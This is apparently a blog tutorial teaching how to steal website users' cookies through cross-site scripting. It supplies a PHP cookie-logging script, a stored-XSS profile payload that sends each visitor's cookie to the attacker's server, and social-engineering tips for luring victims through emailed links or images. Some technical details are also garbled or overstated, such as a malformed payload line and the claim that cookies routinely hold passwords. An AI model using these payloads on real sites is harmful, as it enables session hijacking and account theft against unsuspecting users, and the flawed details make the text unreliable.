Cookie stealing is one of the most fundamental aspect of XSS (cross site scripting). Cookies are used to store valuable information such as Username, Password, IP address and much more, and thats why cookie is so important. Cookie stealing is a process of getting and changing other people’s cookies.
Go to a website that requires a login and after logging erase everything in addressbar and type "javascript:alert(document.cookie)" and press enter. You should see a pop-up window with some information of your login details like username, password etc. It may be possible that cookie contains paswords in hash but with some luck hashes, can be cracked. Sometimes it may also be possible to just paste the hash in your cookie at right place and you are able to login with victim's account.
This does not mean that to get an victim’s password, you have to get him to sit down, login, make him to type script that show you the alert box. You have to be smart and use tricks. These tricking techniques are something known as social engineering. All you have to do is fool victim. For example, after login make him to click on a page/link that contains the malicious script.
For cookie stealing first, you have to find the XSS vulnerability. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with profile option, etc. Most websites apply some sort of filter to input. XSS deals with finding exploits within filters, allowing you to put your own code into website.
Example:
Get a free web host that supports PHP and make a new file. In the new file, type in this:
$cookie=$_GET['cookie'] . "\n";
$fh=fopen('evil.txt','ab');
fwrite($fh,$cookie);
fclose($fh);
?>
save it as evil.php. Now make an empty text file named evil.txt.
Lets assume that we have a website that has user login as well as profile option and doesn't have any kind of filtering on. This means that you can put HTML and Javascript in your profile. If in your profile you write the following code.
document.location=http://yourwebsite.com/evil.php?cookie=document.cookie
whenever someone views your profile he will be redirected to you script with their cookie in URL. If you were look at evil.txt now, you would see the cookie of victim.
You can steal the cookie of victim's mail accounts by simply mailing the victim a e-mail that contains the link of script. If the victim clicks on link you are able to get the information that is stored in his cookie. You can hide the scripts in image also.
No comments:
Post a Comment